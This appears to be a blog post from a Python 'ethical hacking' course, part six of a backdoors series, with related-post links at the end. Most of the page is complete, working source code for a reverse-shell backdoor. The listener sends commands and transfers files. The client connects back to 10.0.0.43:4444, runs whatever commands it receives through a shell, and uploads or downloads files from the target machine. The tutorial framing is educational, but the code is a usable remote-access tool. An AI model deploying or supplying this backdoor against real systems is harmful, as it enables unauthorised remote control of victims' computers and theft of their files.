File Upload:

  • A file is a series of characters.
  • Uploading a file is the opposite of downloading a file.
  • Therefore to transfer a file we need to:
    • 1. Read the file as a sequence of characters.
    • 2. Send this sequence of characters.
    • 3. Create a new empty file at the destination.
    • 4. Store the transferred sequence of characters in the new file.

Server Side - Listener code

#!/usr/bin/env python

import socket

import json

import base64

class Listener:

    def __init__(self, ip, port):

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        listener.bind((ip, port))

        listener.listen(0)

        print("[+] Waiting for incoming connections")

        self.connection, address = listener.accept()

        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_remotely(self, command):

        self.reliable_send(command)

        if command[0] == "exit":

            self.connection.close()

            exit()

        return self.reliable_receive()

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Download successful."

    def run(self):

        while True:

            command = input(">> ")

            command = command.split(" ")

            if command[0] == "upload":

                file_content = self.read_file(command[1]).decode()

                command.append(file_content)

            result = self.execute_remotely(command)

            if command[0] == "download":

                result = self.write_file(command[1], result)

            print(result)

my_listener = Listener("10.0.0.43", 4444)

my_listener.run()

Client Side - Backdoor code

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Upload successful."

    def run(self):

        while True:

            command = self.reliable_receive()

            if command[0] == "exit":

                self.connection.close()

                exit()

            elif command[0] == "cd" and len(command) > 1:

                command_result = self.change_working_directory_to(command[1])

            elif command[0] == "upload":

                command_result = self.write_file(command[1], command[2])

            elif command[0] == "download":

                command_result = self.read_file(command[1]).decode()

            else:

                command_result = self.execute_system_command(command).decode()

            self.reliable_send(command_result)

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Upload files from Kali Linux to the target client.

Python Ethical Hacking - BACKDOORS(6)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(3)

    BACKDOORS Sockets Problem: TCP is stream-based. Difficult to identify the end of message/batch. Solu ...

  3. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  4. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. Java-CORBA

    本文HelloCorba参考 Getting Started with JavaTM IDL 说在前面 Java TM IDL is a technology for distributed obje ...

  2. spring cloud config 配置文件更新

    Spring Cloud Config Server 作为配置中心服务端 拉取配置时更新 git 仓库副本,保证是最新结果 支持数据结构丰富,yml, json, properties 等 配合 eu ...

  3. 黎活明8天快速掌握android视频教程--15_采用Pull解析器解析和生成XML内容

    1.该项目主要有下面的两个作用 (1)将xml文件解析成对象的List对象,xml文件可以来自手机本地,也可以来自服务器返回的xml数据 (2)强list对象保存成xml文件,xml保存到手机的内存卡 ...

  4. activiti学习笔记一

    activiti学习笔记 在讲activiti之前我们必须先了解一下什么是工作流,什么是工作流引擎. 在我们的日常工作中,我们会碰到很多流程化的东西,什么是流程化呢,其实通俗来讲就是有一系列固定的步骤 ...

  5. MAC安装VMware fusion

    1.下载VMware fusion 11 https://www.vmware.com/cn/products/fusion/fusion-evaluation.html 2.安装后启用输入注册码 V ...

  6. ajax前后端交互原理(7)

    7.ajax函数封装 7.1.实例引入 需求: 每秒钟请求一次服务器 获取到数据 实现: 把ajax进行封装 <!DOCTYPE html> <html> <head&g ...

  7. JavaScript基础有关构造函数、new关键字和this关键字(009)

    1. 总是记得用new关键字来执行构造函数.前面提到,可以用构造函数创建JavaScript的对象,这个构造函数在使用的时候需要使用new关键字,但如果忘记写入new关键字,会怎么样?事实上这个函数还 ...

  8. 洛谷 P4822 [BJWC2012]冻结

    之前没学分层图,所以先咕了一下hiahiahia. 学完分层图了回来水写题解了. 这道题要用分层图来解.分层图就是在我们决策的时候,再建k层图,一共k+1层,层与层之间是有向边(这个很重要的),权值为 ...

  9. 平常我们是如何区分css中class和id之间有什么区别的?

    我们平常在用DIV+CSS制作html网页页面时,常会用到class 和id来选择调用CSS样式属性.对学习CSS的新手来说class和id可能比较模糊,同时不知道什么时候该用class,什么时候又用 ...

  10. 2.Unity3d常用按键

    Unity3d常用按键和组合键: 1.鼠标左键:选中物体 2.鼠标中键:平移视角,和手型功能一样 3.鼠标右键:旋转观察角度 4.Alt+鼠标左键:旋转观察角度 5.Alt+鼠标右键:拉远拉近